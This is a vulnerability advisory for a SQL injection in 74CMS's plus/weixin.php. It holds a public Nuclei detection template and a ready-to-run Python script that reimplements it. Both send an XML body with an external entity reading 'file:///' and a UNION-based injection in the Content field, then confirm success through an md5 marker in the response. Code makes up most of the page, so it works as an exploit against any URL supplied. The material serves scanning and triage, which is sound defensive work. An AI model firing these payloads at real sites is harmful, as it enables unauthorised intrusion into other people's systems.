74cms-weixin-sqli: 74CMS weixin.php - SQL Injection

Date: 2025-08-01 | Affected software: 74cms weixin | PoC: public

Vulnerability description

plus/weixin.php parses the XML message body that is POSTed to it. PHP's libxml_disable_entity_loader function can block XML eXternal Entity (XXE) injection, but the application leaves enabling it to the user; when it is not enabled, no filtering is applied to the parsed fields, and the unescaped Content field reaches a SQL query, giving SQL injection. The PoC below sends `1%' union select md5(999999999)#` in Content; if the MD5 hex digest of 999999999 appears in the response, the injected query was executed. Note that the request's signature parameter, da39a3ee5e6b4b0d3255bfef95601890afd80709, is the SHA-1 of the empty string and is sent together with empty timestamp and nonce values; the reference does not explain why a vulnerable install accepts it.

PoC code [public]

id: 74cms-weixin-sqli

info:
  name: 74CMS weixin.php - SQL Injection
  author: SleepingBag945
  severity: high
  description: |
    There is a libxml_disable_entity_loader function to prevent XML eXternal Entity Injection, but this function needs to be customized by the user. If the user does not customize it, there will be no filtering, which leads to SQL injection vulnerabilities.
  reference:
    - https://cn-sec.com/archives/25900.html
  classification:
    cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="骑士-74CMS"
    product: 74cms
    vendor: 74cms
  tags: 74cms,weixin,sqli,vuln

variables:
  num: '999999999'

http:
  - raw:
      - |
        POST /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709&timestamp=&nonce= HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version="1.0" encoding="utf-8"?><!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///">]><xml><ToUserName>&test;</ToUserName><FromUserName>1111</FromUserName><MsgType>123</MsgType><FuncFlag>3</FuncFlag><Content>1%' union select md5({{num}})#</Content></xml>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ba9cf7f534df5f75dca4d58f6a11474716bf41c94c1c53ea9f9121fa6b8d50a202202ab548d82bd1071639538c76a262a3c27cd267819509fbc2dd934c2a10bb4871:922c64590222798bb761d5b6d8e72950
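The request and the oracle from the template above, rewritten in Python as an added example; this is not 74cms code, not the template author's code, and not from the cn-sec reference. It assumes only what the template shows: the path /plus/weixin.php, the XML body, and the md5 marker check. The wechat_signature helper implements the public WeChat platform algorithm (SHA-1 of token, timestamp and nonce sorted lexicographically and concatenated) to show that the PoC's fixed signature value is what that algorithm produces when all three are empty; that 74cms validates the signature in exactly this way is an assumption, not something the page states.

```python
import hashlib
import urllib.error
import urllib.request

# Added example: reimplements the Nuclei template's request and oracle.
# Not 74cms code and not the template author's code.

WEIXIN_PATH = "/plus/weixin.php"  # path taken from the PoC request line


def wechat_signature(token: str, timestamp: str, nonce: str) -> str:
    """Public WeChat platform check: sha1 of the three values sorted and joined.
    Assumption: whether 74cms checks the signature this way is not stated on
    the page; the helper only shows where the PoC's fixed value comes from."""
    joined = "".join(sorted([token, timestamp, nonce]))
    return hashlib.sha1(joined.encode()).hexdigest()


def build_payload(num: str) -> str:
    """The template's XML body; Content carries the UNION injection. The
    DOCTYPE with a SYSTEM entity is copied from the PoC unchanged."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///">]>'
        "<xml><ToUserName>&test;</ToUserName><FromUserName>1111</FromUserName>"
        "<MsgType>123</MsgType><FuncFlag>3</FuncFlag>"
        f"<Content>1%' union select md5({num})#</Content></xml>"
    )


def expected_marker(num: str) -> str:
    """MySQL's md5() hashes the number's decimal text, so this equals what the
    injected md5({num}) returns if the query is executed server-side."""
    return hashlib.md5(num.encode()).hexdigest()


def is_injectable(status: int, body: str, num: str) -> bool:
    """Same verdict as the template's matchers: HTTP 200 and the marker in the body."""
    return status == 200 and expected_marker(num) in body


def probe(base_url: str, num: str = "999999999", timeout: float = 10.0) -> bool:
    """Send the PoC to a host you are authorised to test and return the verdict.
    This is the only function that performs network I/O."""
    query = "?signature=%s&timestamp=&nonce=" % wechat_signature("", "", "")
    req = urllib.request.Request(
        base_url.rstrip("/") + WEIXIN_PATH + query,
        data=build_payload(num).encode(),
        headers={"Content-Type": "text/xml"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        # A non-2xx answer still carries a body worth checking for the marker.
        status, body = err.code, err.read().decode("utf-8", "replace")
    return is_injectable(status, body, num)


if __name__ == "__main__":
    import sys

    print(probe(sys.argv[1]))
```

Run it with the target's base URL as the only argument. Keeping the verdict in is_injectable, separate from the HTTP call, lets the oracle be checked against captured responses without touching the network, and the md5 marker is a constant to grep for in proxy logs when triaging scanner traffic.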